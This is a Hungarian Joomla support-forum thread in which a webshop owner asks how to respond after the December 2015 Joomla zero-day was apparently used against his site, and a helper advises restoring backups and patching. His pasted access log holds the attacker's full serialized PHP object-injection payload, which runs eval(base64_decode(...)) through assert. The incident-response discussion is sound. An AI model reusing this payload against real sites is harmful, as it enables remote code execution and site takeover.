Fontos J! 0-day sebezhetőség kihasználása esetén mit tegyek?

Több
2015 dec. 15 07:41 #1 Írta: Beni
Beni létrehozta a témát: J! 0-day sebezhetőség kihasználása esetén mit tegyek?
Sziasztok!

Most jött ki a Joomla 3.4.6, ami ugye kritikus biztonsági frissítést tartalmaz.
Az alábbi cikk alapján utánanéztem, nem-e már éríntett a weboldalam, és igen, már kihasználták, mielőtt javítottam. :angry:
blog.sucuri.net/2015/12/remote-command-e...ility-in-joomla.html
Az érintett oldal J!2.5

A log fájlban ezt találtam:
146.0.72.83 - - [13/Dec/2015:15:43:42 +0100] "GET / HTTP/1.1" 200 44214 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

146.0.72.83 - - [13/Dec/2015:15:43:43 +0100] "POST / HTTP/1.1" 200 44214 "-" "Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96 Safari/537.36"

Csak gőzöm sincs, mi a további teendő...
Hogyan lehet kideríteni, mit csináltak?
Beni

Jelentkezz be, hogy te is részt vehess beszélgetésben!

Több
2015 dec. 15 09:24 #2 Írta: Balázs
Balázs válaszolt a témára: J! 0-day sebezhetőség kihasználása esetén mit tegyek?
Utolsó tiszta biztonsági mentés visszaállítása + a SessionFix25v1 javítócsomag felmásolása.

Ha bizalmas információt szeretnél közölni az adminokkal, akkor tedd az üzeneted tartalmát a [ confidential ][ /confidential ] címkék közé (szóközök nélkül).

Joomla! tanácsadás, oktatás, fejlesztés - joomlabs.hu
A következő felhasználók mondtak köszönetet: Beni

Jelentkezz be, hogy te is részt vehess beszélgetésben!

Több
2015 dec. 15 11:08 #3 Írta: Beni
Beni válaszolt a témára: J! 0-day sebezhetőség kihasználása esetén mit tegyek?
Szia Balázs,
A javítócsomagot feltettem. Minden napra megvan a biztonsági mentés (MediaC), de a feltételezett támadás előtti állapothoz képest Winmerge-vel átnéztem az adatbázist ill. a teljes fájlrendszert, és nem találtam semmi gyanúsat. NOD32-vel is átnézettem, az sem talált semmit. Az oldalon minden rendben működik. Elképzelhető, hogy a támadás sikertelen volt?
Csak végszükségben folyamodnék a biztonsági mentés visszaállításához - egy viszonylag nagy forgalmú webáruház és elég sok adat eltűnne.
Mindenképpen javasolt a biztonsági mentés visszaállítása?
A Log fájlban találtakhoz abszolute nem értek, csak a linkelt cikk alapján találtam rá erre. Van egy jópár htacces védelem az oldalon, + a szolgáltató biztonsági cuccai... Hátha nem is történt semmi?

Van-e még valamilyen mód arra, hogy ellenőrizzem ezt a dolgot?
Előre is köszönöm!

Jelentkezz be, hogy te is részt vehess beszélgetésben!

Több
2015 dec. 15 11:27 #4 Írta: Balázs
Balázs válaszolt a témára: J! 0-day sebezhetőség kihasználása esetén mit tegyek?
Abba belelátsz a log alapján, hogy gyanús fájl- vagy adatbázisművetelek történtek-e azóta?

Ha bizalmas információt szeretnél közölni az adminokkal, akkor tedd az üzeneted tartalmát a [ confidential ][ /confidential ] címkék közé (szóközök nélkül).

Joomla! tanácsadás, oktatás, fejlesztés - joomlabs.hu

Jelentkezz be, hogy te is részt vehess beszélgetésben!

Több
2015 dec. 15 11:35 #5 Írta: Beni
Beni válaszolt a témára: J! 0-day sebezhetőség kihasználása esetén mit tegyek?
Ezekről a jelzett ip címekről nem érkezett azóta semmi.
De nem látok semmi más gyanúsat se, csak a szokásos dolgok vannak a logokban.

Jelentkezz be, hogy te is részt vehess beszélgetésben!